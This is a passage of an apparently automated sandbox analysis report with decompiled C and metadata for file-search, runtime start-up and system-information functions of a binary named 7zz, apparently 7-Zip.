                                                                                                                                    0x004182b0
                                                                                                                                    0x00418249
                                                                                                                                    0x0041824c
                                                                                                                                    0x00418250
                                                                                                                                    0x00418252
                                                                                                                                    0x00418257
                                                                                                                                    0x00418257
                                                                                                                                    0x00000000
                                                                                                                                    0x00418252
                                                                                                                                    0x00418208
                                                                                                                                    0x00000000
                                                                                                                                    0x00418208
                                                                                                                                    0x004181ed
                                                                                                                                    0x00000000
                                                                                                                                    0x004181ed
                                                                                                                                    0x004181b3
                                                                                                                                    0x004181b6
                                                                                                                                    0x004181b8
                                                                                                                                    0x0041826e
                                                                                                                                    0x00000000
                                                                                                                                    0x0041826e
                                                                                                                                    0x00000000
                                                                                                                                    0x0041825a
                                                                                                                                    0x0041825a
                                                                                                                                    0x00418260
                                                                                                                                    0x00418260
                                                                                                                                    0x00000000
                                                                                                                                    0x00418269
                                                                                                                                    0x004180f9
                                                                                                                                    0x00418105
                                                                                                                                    0x00418111
                                                                                                                                    0x00418114
                                                                                                                                    0x00418118
                                                                                                                                    0x00418120
                                                                                                                                    0x00418127
                                                                                                                                    0x00418133
                                                                                                                                    0x0041813f
                                                                                                                                    0x00418142
                                                                                                                                    0x00418146
                                                                                                                                    0x0041814b
                                                                                                                                    0x0041814c
                                                                                                                                    0x0041814e
                                                                                                                                    0x00418151
                                                                                                                                    0x00418154
                                                                                                                                    0x00418156
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0041815b
                                                                                                                                    0x0041815e
                                                                                                                                    0x00418161
                                                                                                                                    0x00418163
                                                                                                                                    0x00418166
                                                                                                                                    0x00418168
                                                                                                                                    0x00418168
                                                                                                                                    0x0041816a
                                                                                                                                    0x0041816d
                                                                                                                                    0x0041816f
                                                                                                                                    0x00418171
                                                                                                                                    0x00418171
                                                                                                                                    0x00418173
                                                                                                                                    0x00418177
                                                                                                                                    0x00418178
                                                                                                                                    0x00418178
                                                                                                                                    0x0041817d
                                                                                                                                    0x0041817f
                                                                                                                                    0x00418181
                                                                                                                                    0x00418183
                                                                                                                                    0x0041818b
                                                                                                                                    0x00418191
                                                                                                                                    0x00418191
                                                                                                                                    0x00418183
                                                                                                                                    0x00000000
                                                                                                                                    0x0041817f
                                                                                                                                    0x00418049
                                                                                                                                    0x00418052
                                                                                                                                    0x00418054
                                                                                                                                    0x00418058
                                                                                                                                    0x0041805c
                                                                                                                                    0x00418060
                                                                                                                                    0x00418064
                                                                                                                                    0x00418068
                                                                                                                                    0x0041806c
                                                                                                                                    0x0041806c
                                                                                                                                    0x0041806e
                                                                                                                                    0x0041806e
                                                                                                                                    0x00418075
                                                                                                                                    0x00418077
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00418079
                                                                                                                                    0x0041807a
                                                                                                                                    0x0041807d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0041807f
                                                                                                                                    0x00418083
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00418085
                                                                                                                                    0x00418089
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0041808b
                                                                                                                                    0x0041808d
                                                                                                                                    0x00418090
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00418092
                                                                                                                                    0x00418092
                                                                                                                                    0x0041809a
                                                                                                                                    0x004180a9
                                                                                                                                    0x004180ae
                                                                                                                                    0x004180b0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004180b2
                                                                                                                                    0x004180b3
                                                                                                                                    0x004180b6
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004180b8
                                                                                                                                    0x004180c0
                                                                                                                                    0x004180c9
                                                                                                                                    0x004180d1
                                                                                                                                    0x00000000
                                                                                                                                    0x004180d1
                                                                                                                                    0x00000000
                                                                                                                                    0x0041806e
                                                                                                                                    0x00000000
                                                                                                                                    0x00418026
                                                                                                                                    0x00417fd3
                                                                                                                                    0x00417fd8
                                                                                                                                    0x00417fda
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00417fda
                                                                                                                                    0x00417cfa
                                                                                                                                    0x00417cfd
                                                                                                                                    0x00417d14
                                                                                                                                    0x00417d1c
                                                                                                                                    0x00417d21
                                                                                                                                    0x00417d2c
                                                                                                                                    0x00417d2f
                                                                                                                                    0x00417d32
                                                                                                                                    0x00417d3e
                                                                                                                                    0x00417d42
                                                                                                                                    0x00417d47
                                                                                                                                    0x00417d51
                                                                                                                                    0x00417d54
                                                                                                                                    0x00417d56
                                                                                                                                    0x00417d65
                                                                                                                                    0x00417d69
                                                                                                                                    0x00417d6e
                                                                                                                                    0x00417d70
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00417d72
                                                                                                                                    0x00417d75
                                                                                                                                    0x00417d9d
                                                                                                                                    0x00417da0
                                                                                                                                    0x00417da3
                                                                                                                                    0x00417da6
                                                                                                                                    0x00417db2
                                                                                                                                    0x00417db6
                                                                                                                                    0x00417dc5
                                                                                                                                    0x00417dc8
                                                                                                                                    0x00417dcd
                                                                                                                                    0x00417dd0
                                                                                                                                    0x00417dd7
                                                                                                                                    0x00417e32
                                                                                                                                    0x00417e34
                                                                                                                                    0x00417e37
                                                                                                                                    0x00417e70
                                                                                                                                    0x00417e70
                                                                                                                                    0x00417e70
                                                                                                                                    0x00417e70
                                                                                                                                    0x00417e73
                                                                                                                                    0x00417e75
                                                                                                                                    0x00417f4c
                                                                                                                                    0x00417f4c
                                                                                                                                    0x00417f4e
                                                                                                                                    0x00417f51
                                                                                                                                    0x00417f72
                                                                                                                                    0x00417f75
                                                                                                                                    0x00417f83
                                                                                                                                    0x00417f84
                                                                                                                                    0x00417f91
                                                                                                                                    0x00417f94
                                                                                                                                    0x00417f9c
                                                                                                                                    0x00417f9f
                                                                                                                                    0x00417fa5
                                                                                                                                    0x00417fb0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00417f53
                                                                                                                                    0x00417f53
                                                                                                                                    0x00417f56
                                                                                                                                    0x00417f59
                                                                                                                                    0x00417f5e
                                                                                                                                    0x00417f67
                                                                                                                                    0x00417f67
                                                                                                                                    0x00417f6c
                                                                                                                                    0x00417f6d
                                                                                                                                    0x00417f6d
                                                                                                                                    0x00000000
                                                                                                                                    0x00417f53
                                                                                                                                    0x00417e7f
                                                                                                                                    0x00417e7f
                                                                                                                                    0x00417e82
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00417e87
                                                                                                                                    0x00417e87
                                                                                                                                    0x00417e93
                                                                                                                                    0x00417e97
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00417e99
                                                                                                                                    0x00417e9a
                                                                                                                                    0x00417e9d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00417e9d
                                                                                                                                    0x00417e9f
                                                                                                                                    0x00417ea2
                                                                                                                                    0x00417ea2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00417ebb
                                                                                                                                    0x00417ebb
                                                                                                                                    0x00417ebd
                                                                                                                                    0x00417ec0
                                                                                                                                    0x00417ec6
                                                                                                                                    0x00417ecc
                                                                                                                                    0x00417ecf
                                                                                                                                    0x00417ed2
                                                                                                                                    0x00417ed5
                                                                                                                                    0x00417ed7
                                                                                                                                    0x00417eda
                                                                                                                                    0x00417f2e
                                                                                                                                    0x00417f2e
                                                                                                                                    0x00000000
                                                                                                                                    0x00417f2e
                                                                                                                                    0x00417ee2
                                                                                                                                    0x00417ee4
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00417ee6
                                                                                                                                    0x00417ee9
                                                                                                                                    0x00417eeb
                                                                                                                                    0x00417eee
                                                                                                                                    0x00417f0b
                                                                                                                                    0x00417f14
                                                                                                                                    0x00417f1c
                                                                                                                                    0x00417f2a
                                                                                                                                    0x00000000
                                                                                                                                    0x00417f2a
                                                                                                                                    0x00417ef3
                                                                                                                                    0x00417ef3
                                                                                                                                    0x00417ef5
                                                                                                                                    0x00417ef8
                                                                                                                                    0x00417efd
                                                                                                                                    0x00417f00
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00417f02
                                                                                                                                    0x00417f03
                                                                                                                                    0x00417f06
                                                                                                                                    0x00417f09
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00417f09
                                                                                                                                    0x00000000
                                                                                                                                    0x00417f35
                                                                                                                                    0x00417f35
                                                                                                                                    0x00417f38
                                                                                                                                    0x00417f38
                                                                                                                                    0x00417f40
                                                                                                                                    0x00417f41
                                                                                                                                    0x00417f44
                                                                                                                                    0x00417e7d
                                                                                                                                    0x00417e7d
                                                                                                                                    0x00000000
                                                                                                                                    0x00417e7d
                                                                                                                                    0x00417f4a
                                                                                                                                    0x00417f4a
                                                                                                                                    0x00000000
                                                                                                                                    0x00417f4a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00417e39
                                                                                                                                    0x00417e39
                                                                                                                                    0x00417e45
                                                                                                                                    0x00417e48
                                                                                                                                    0x00417e4c
                                                                                                                                    0x00417e5d
                                                                                                                                    0x00417e5d
                                                                                                                                    0x00417e61
                                                                                                                                    0x00417e63
                                                                                                                                    0x00417e63
                                                                                                                                    0x00417e6a
                                                                                                                                    0x00417e6b
                                                                                                                                    0x00417e6b
                                                                                                                                    0x00000000
                                                                                                                                    0x00417e39
                                                                                                                                    0x00417ddc
                                                                                                                                    0x00417ddf
                                                                                                                                    0x00417de7
                                                                                                                                    0x00417dea
                                                                                                                                    0x00417df0
                                                                                                                                    0x00417dfb
                                                                                                                                    0x00000000
                                                                                                                                    0x00417dfb
                                                                                                                                    0x00417d79
                                                                                                                                    0x00417d7a
                                                                                                                                    0x00417d7d
                                                                                                                                    0x00417d80
                                                                                                                                    0x00417d86
                                                                                                                                    0x00417d90
                                                                                                                                    0x00000000
                                                                                                                                    0x00417d90
                                                                                                                                    0x00417d58
                                                                                                                                    0x00417d58
                                                                                                                                    0x00000000
                                                                                                                                    0x00417d58
                                                                                                                                    0x00417d07
                                                                                                                                    0x00417d0c
                                                                                                                                    0x00417d0e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00417d0e
                                                                                                                                    0x00417cdc
                                                                                                                                    0x00417ce0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00417ceb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00417c8d
                                                                                                                                    0x00417c8d
                                                                                                                                    0x00417c9f
                                                                                                                                    0x00417ca1
                                                                                                                                    0x00417cc9
                                                                                                                                    0x00417ca3
                                                                                                                                    0x00417cac
                                                                                                                                    0x00417caf
                                                                                                                                    0x00417cb5
                                                                                                                                    0x00417cc0
                                                                                                                                    0x00417cc0
                                                                                                                                    0x00417cce
                                                                                                                                    0x00417cd1
                                                                                                                                    0x00417cd2
                                                                                                                                    0x00417cd2
                                                                                                                                    0x00000000
                                                                                                                                    0x00417c8d
                                                                                                                                    0x00417c76
                                                                                                                                    0x00000000
                                                                                                                                    0x00417c0b
                                                                                                                                    0x00417c0b
                                                                                                                                    0x00417c0e
                                                                                                                                    0x00000000
                                                                                                                                    0x00417c12
                                                                                                                                    0x00417c16
                                                                                                                                    0x00417c22
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00417c29
                                                                                                                                    0x00417c29
                                                                                                                                    0x00417c2b
                                                                                                                                    0x00417c2d
                                                                                                                                    0x00417c36
                                                                                                                                    0x00417c3f
                                                                                                                                    0x00417c43
                                                                                                                                    0x00417c4b
                                                                                                                                    0x00417c4f
                                                                                                                                    0x00417c54
                                                                                                                                    0x00000000
                                                                                                                                    0x00417c18
                                                                                                                                    0x00417c1a
                                                                                                                                    0x00417c26
                                                                                                                                    0x00417c26
                                                                                                                                    0x00000000
                                                                                                                                    0x00417c1c
                                                                                                                                    0x00417c1d
                                                                                                                                    0x00000000
                                                                                                                                    0x00417c1d
                                                                                                                                    0x00417c1a

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID: !$000$001$R$Unknown error$a$c[@$exe$iso$r$rar$tI
                                                                                                                                    • API String ID: 3519838083-4101332242
                                                                                                                                    • Opcode ID: 888c18cb6e9df12041bb648b2e57063498dd0312242c36b3cc9d8ea90d7e26e7
                                                                                                                                    • Instruction ID: ff5ff08527ddfe2bc4deabd4e0b21c70904ab096e5b089e9ffbf148357062f4e
                                                                                                                                    • Opcode Fuzzy Hash: 888c18cb6e9df12041bb648b2e57063498dd0312242c36b3cc9d8ea90d7e26e7
                                                                                                                                    • Instruction Fuzzy Hash: 7552C030D04248DFCF15DFA5C8809EEBBB5AF48314F24846EE445AB391DB389A86CF59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040B174 Relevance: 7.6, APIs: 5, Instructions: 88fileCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1919 40b174-40b18e __EH_prolog call 40b154 1922 40b194-40b19d 1919->1922 1923 40b27c-40b288 1919->1923 1924 40b20f-40b263 call 403532 AreFileApisANSI call 40822f FindFirstFileA call 407a18 * 2 1922->1924 1925 40b19f-40b1b7 FindFirstFileW 1922->1925 1931 40b273-40b279 1924->1931 1948 40b265-40b26e call 40b2ea 1924->1948 1927 40b1f9-40b1fd 1925->1927 1928 40b1b9-40b1dc call 401e9a call 40b863 1925->1928 1927->1931 1932 40b1ff-40b20d call 40b28b 1927->1932 1942 40b1ec-40b1f8 call 407a18 1928->1942 1943 40b1de-40b1ea FindFirstFileW 1928->1943 1931->1923 1932->1931 1942->1927 1943->1942 1948->1931
                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                    			E0040B174(void** __ecx, void* __edi, void* __eflags) {
				signed int _t34;
				signed int _t36;
				void* _t47;
				void* _t53;
				void** _t77;
				void* _t79;
				intOrPtr _t86;

				L0046B890(0x473d64, _t79);
				_t77 = __ecx;
				_t34 = E0040B154(__ecx);
				if(_t34 == 0) {
					L11:
					 *[fs:0x0] =  *((intOrPtr*)(_t79 - 0xc));
					return _t34;
				}
				_t86 =  *0x490a7c; // 0x1
				if(_t86 == 0) {
					L00403532(_t79 - 0x24,  *(_t79 + 8));
					 *(_t79 - 4) = 1;
					_t36 = AreFileApisANSI();
					asm("sbb eax, eax");
					_push( ~_t36 + 1);
					 *_t77 = FindFirstFileA( *(E0040822F(_t79 - 0x30)), _t79 - 0x170);
					E00407A18( *((intOrPtr*)(_t79 - 0x30)));
					 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
					E00407A18( *((intOrPtr*)(_t79 - 0x24)));
					__eflags =  *_t77 - 0xffffffff;
					if(__eflags != 0) {
						L0040B2EA(_t79 - 0x170,  *((intOrPtr*)(_t79 + 0xc)), __eflags);
					}
					L10:
					_t34 = 0 |  *_t77 != 0xffffffff;
					goto L11;
				}
				_t47 = FindFirstFileW( *(_t79 + 8), _t79 - 0x3c0); // executed
				 *_t77 = _t47;
				if(_t47 != 0xffffffff) {
					L6:
					_t90 =  *_t77 - 0xffffffff;
					if( *_t77 != 0xffffffff) {
						L0040B28B(_t79 - 0x3c0,  *((intOrPtr*)(_t79 + 0xc)), _t90);
					}
					goto L10;
				}
				 *(_t79 - 0x18) = 0;
				 *((intOrPtr*)(_t79 - 0x14)) = 0;
				 *((intOrPtr*)(_t79 - 0x10)) = 0;
				E00401E9A(_t79 - 0x18, 3);
				 *(_t79 - 4) = 0;
				if(L0040B863(_t79 - 0x18) != 0) {
					_t53 = FindFirstFileW( *(_t79 - 0x18), _t79 - 0x3c0); // executed
					 *_t77 = _t53;
				}
				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
				E00407A18( *(_t79 - 0x18));
				goto L6;
			}










                                                                                                                                    0x0040b179
                                                                                                                                    0x0040b185
                                                                                                                                    0x0040b187
                                                                                                                                    0x0040b18e
                                                                                                                                    0x0040b27c
                                                                                                                                    0x0040b280
                                                                                                                                    0x0040b288
                                                                                                                                    0x0040b288
                                                                                                                                    0x0040b197
                                                                                                                                    0x0040b19d
                                                                                                                                    0x0040b215
                                                                                                                                    0x0040b21a
                                                                                                                                    0x0040b221
                                                                                                                                    0x0040b229
                                                                                                                                    0x0040b232
                                                                                                                                    0x0040b24b
                                                                                                                                    0x0040b24d
                                                                                                                                    0x0040b255
                                                                                                                                    0x0040b259
                                                                                                                                    0x0040b25e
                                                                                                                                    0x0040b263
                                                                                                                                    0x0040b26e
                                                                                                                                    0x0040b26e
                                                                                                                                    0x0040b273
                                                                                                                                    0x0040b279
                                                                                                                                    0x00000000
                                                                                                                                    0x0040b279
                                                                                                                                    0x0040b1b0
                                                                                                                                    0x0040b1b5
                                                                                                                                    0x0040b1b7
                                                                                                                                    0x0040b1f9
                                                                                                                                    0x0040b1f9
                                                                                                                                    0x0040b1fd
                                                                                                                                    0x0040b208
                                                                                                                                    0x0040b208
                                                                                                                                    0x00000000
                                                                                                                                    0x0040b1fd
                                                                                                                                    0x0040b1be
                                                                                                                                    0x0040b1c1
                                                                                                                                    0x0040b1c4
                                                                                                                                    0x0040b1c7
                                                                                                                                    0x0040b1d2
                                                                                                                                    0x0040b1dc
                                                                                                                                    0x0040b1e8
                                                                                                                                    0x0040b1ea
                                                                                                                                    0x0040b1ea
                                                                                                                                    0x0040b1ef
                                                                                                                                    0x0040b1f3
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 0040B179
                                                                                                                                      • Part of subcall function 0040B154: FindClose.KERNELBASE(00000000,?,0040B18C), ref: 0040B15F
                                                                                                                                    • FindFirstFileW.KERNELBASE(000000FF,?,?), ref: 0040B1B0
                                                                                                                                    • FindFirstFileW.KERNELBASE(00000002,?,00000003), ref: 0040B1E8
                                                                                                                                    • AreFileApisANSI.KERNEL32(000000FF), ref: 0040B221
                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,00000001), ref: 0040B242
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFind$First$ApisCloseH_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4121580741-0
                                                                                                                                    • Opcode ID: d3209179485d2956c5e4d69de9ffb02c1c5f3dcedd3250a6e954bbfd267ad7e9
                                                                                                                                    • Instruction ID: fbd6ce0b626e89321ef8dbff40679b25df86b8bcd2a774ab2a160b2ca2317645
                                                                                                                                    • Opcode Fuzzy Hash: d3209179485d2956c5e4d69de9ffb02c1c5f3dcedd3250a6e954bbfd267ad7e9
                                                                                                                                    • Instruction Fuzzy Hash: F0316B3180020ADBCB15EFA4D8459EDBB78FF04324F20466EE461B72E1DB395A85CB98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0046CF4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                    			_entry_(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				unsigned int _t8;
				intOrPtr _t18;
				intOrPtr _t19;
				signed int _t25;
				intOrPtr _t41;

				_t37 = __edi;
				_push(0xffffffff);
				_push(0x47c8a0);
				_push(E0046CE74);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t41;
				_push(__edi);
				_v28 = _t41 - 0x10;
				_t8 = GetVersion();
				 *0x4936fc = 0;
				_t25 = _t8 & 0x000000ff;
				 *0x4936f8 = _t25;
				 *0x4936f4 = _t25 << 8;
				 *0x4936f0 = _t8 >> 0x10;
				if(E0046EA66(_t25 << 8, 1) == 0) {
					E0046D061(0x1c);
				}
				if(E0046E31C() == 0) {
					E0046D061(0x10);
				}
				_v8 = _v8 & 0x00000000;
				E0046FCD7(); // executed
				 *0x49659c = GetCommandLineA();
				 *0x493670 = E00470AD6();
				E00470889();
				E004707D0();
				E0046E6C8();
				_t18 =  *0x49370c; // 0x2271480
				 *0x493710 = _t18;
				_push(_t18);
				_push( *0x493704);
				_push( *0x493700); // executed
				_t19 = E00405C72(_v8); // executed
				_v32 = _t19;
				E0046E6F5(_t19);
				_v36 =  *((intOrPtr*)( *_v24));
				return E00470658(_t37, _v8,  *((intOrPtr*)( *_v24)), _v24);
			}













                                                                                                                                    0x0046cf4c
                                                                                                                                    0x0046cf4f
                                                                                                                                    0x0046cf51
                                                                                                                                    0x0046cf56
                                                                                                                                    0x0046cf61
                                                                                                                                    0x0046cf62
                                                                                                                                    0x0046cf6e
                                                                                                                                    0x0046cf6f
                                                                                                                                    0x0046cf72
                                                                                                                                    0x0046cf7c
                                                                                                                                    0x0046cf84
                                                                                                                                    0x0046cf8a
                                                                                                                                    0x0046cf95
                                                                                                                                    0x0046cf9e
                                                                                                                                    0x0046cfad
                                                                                                                                    0x0046cfb1
                                                                                                                                    0x0046cfb6
                                                                                                                                    0x0046cfbe
                                                                                                                                    0x0046cfc2
                                                                                                                                    0x0046cfc7
                                                                                                                                    0x0046cfc8
                                                                                                                                    0x0046cfcc
                                                                                                                                    0x0046cfd7
                                                                                                                                    0x0046cfe1
                                                                                                                                    0x0046cfe6
                                                                                                                                    0x0046cfeb
                                                                                                                                    0x0046cff0
                                                                                                                                    0x0046cff5
                                                                                                                                    0x0046cffa
                                                                                                                                    0x0046cfff
                                                                                                                                    0x0046d000
                                                                                                                                    0x0046d006
                                                                                                                                    0x0046d00c
                                                                                                                                    0x0046d014
                                                                                                                                    0x0046d018
                                                                                                                                    0x0046d024
                                                                                                                                    0x0046d030

                                                                                                                                    APIs
                                                                                                                                    • GetVersion.KERNEL32 ref: 0046CF72
                                                                                                                                      • Part of subcall function 0046EA66: HeapCreate.KERNELBASE(00000000,00001000,00000000,0046CFAA,00000001), ref: 0046EA77
                                                                                                                                      • Part of subcall function 0046EA66: HeapDestroy.KERNEL32 ref: 0046EAB6
                                                                                                                                    • GetCommandLineA.KERNEL32 ref: 0046CFD1
                                                                                                                                      • Part of subcall function 0046D061: ExitProcess.KERNEL32 ref: 0046D07E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Heap$CommandCreateDestroyExitLineProcessVersion
                                                                                                                                    • String ID: p?d
                                                                                                                                    • API String ID: 1387771204-3115400767
                                                                                                                                    • Opcode ID: fd750bc3cd7585849bbac3ab2b54539f5ca51bea4ec0c39904099df9b32006d9
                                                                                                                                    • Instruction ID: 870f0fd66317059e0ff95abc7fdc162525e316738eefe618a921cd101cb68cd4
                                                                                                                                    • Opcode Fuzzy Hash: fd750bc3cd7585849bbac3ab2b54539f5ca51bea4ec0c39904099df9b32006d9
                                                                                                                                    • Instruction Fuzzy Hash: EF2105F0940201AFE718BFA2DC42B7A7BA4EB26715F00413FF404A63A1EB3C49008B5E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040C5F4 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0040C5F4() {
				struct _SYSTEM_INFO _v40;

				GetSystemInfo( &_v40); // executed
				return _v40.dwNumberOfProcessors;
			}




                                                                                                                                    0x0040c5fe
                                                                                                                                    0x0040c608

                                                                                                                                    APIs
                                                                                                                                    • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,004012EC,00000000,00000000,00490AB0), ref: 0040C5FE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoSystem
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 31276548-0
                                                                                                                                    • Opcode ID: 1c5c9b3bbc459ceaa168d8dbf2743ba381f88a3378da8e3fc4aaaada2f7fab74
